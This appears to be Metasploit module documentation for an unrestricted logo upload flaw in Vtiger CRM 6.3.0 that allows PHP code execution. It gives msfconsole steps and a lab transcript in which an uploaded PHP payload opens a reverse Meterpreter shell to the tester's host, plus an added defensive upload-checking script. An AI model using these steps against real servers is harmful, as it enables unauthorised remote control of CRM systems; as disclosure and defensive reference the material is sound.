Description
The administration interface of Vtiger CRM v6.3.0 allows the upload of a company logo. The logo upload does not restrict the file type, so it can be used to upload PHP code, which can then be executed by requesting the uploaded file's location.
Vulnerable Application
Options
PHPSHORTTAG
Use the PHP short tag, <?, to wrap the payload.
Default: true
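An added example, not part of the module documentation or of Vtiger's code: a server-side check for a logo upload that refuses the kind of file the Description refers to. The allowlist, reason strings and sample inputs are assumptions constructed for illustration; the tag pattern also covers the short tag <? that PHPSHORTTAG selects, which a search for <?php alone would miss.

```python
import re
from pathlib import Path

# Assumed allowlist for a company logo: extension -> accepted magic bytes.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions commonly mapped to the PHP handler (checked at any position,
# so "logo.php.png" is refused as well).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)", re.I)
# "<?php", "<?=" or the short tag "<?" followed by whitespace. "<?xml" and
# "<?xpacket" (legitimate image metadata) do not match. Heuristic only: the
# extension and magic checks are the primary control.
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.I)


def check_logo(filename: str, data: bytes) -> list:
    """Return reasons to reject an uploaded logo; an empty list means accept."""
    path = Path(Path(filename).name)  # drop any client-supplied directory part
    reasons = []
    if any(PHP_EXT.fullmatch(s) for s in path.suffixes):
        reasons.append("php-extension")
    elif path.suffix.lower() not in ALLOWED:
        reasons.append("extension-not-allowed")
    elif not data.startswith(ALLOWED[path.suffix.lower()]):
        reasons.append("magic-mismatch")
    if PHP_TAG.search(data):
        reasons.append("php-tag")
    return reasons


# Constructed sample uploads (not captured traffic).
PNG_OK = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b'<?xpacket begin="" ?>'
SAMPLES = [
    ("logo.png", PNG_OK),
    ("KpXAXQNKjN.php", b"<? echo 1; ?>"),
    ("logo.png", b"\x89PNG\r\n\x1a\n<?php echo 1; ?>"),
    ("logo.gif", b"<?= 1 ?>"),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, check_logo(name, data) or "accept")
```

Storing accepted logos under a server-generated name in a directory where the PHP handler is disabled removes the dependence on the content heuristic.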
Verification Steps
1. ./msfconsole -q
2. use exploit/multi/http/vtiger_logo_upload_exec
3. set rhosts <rhost>
4. set password <password>
5. run
Scenarios
VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10)
msf5 > use exploit/multi/http/vtiger_logo_upload_exec
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899
rport => 8899
msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin
password => admin
msf5 exploit(multi/http/vtiger_logo_upload_exec) > run
[*] Started reverse TCP handler on 172.22.222.121:4444
[*] Uploading payload: KpXAXQNKjN.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:50295) at 2018-07-30 11:53:50 -0500
[+] Deleted KpXAXQNKjN.php
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows NT MSEDGEWIN10 6.2 build 9200 (Unknow Windows version Enterprise Edition) i586
Meterpreter : php/windows
meterpreter >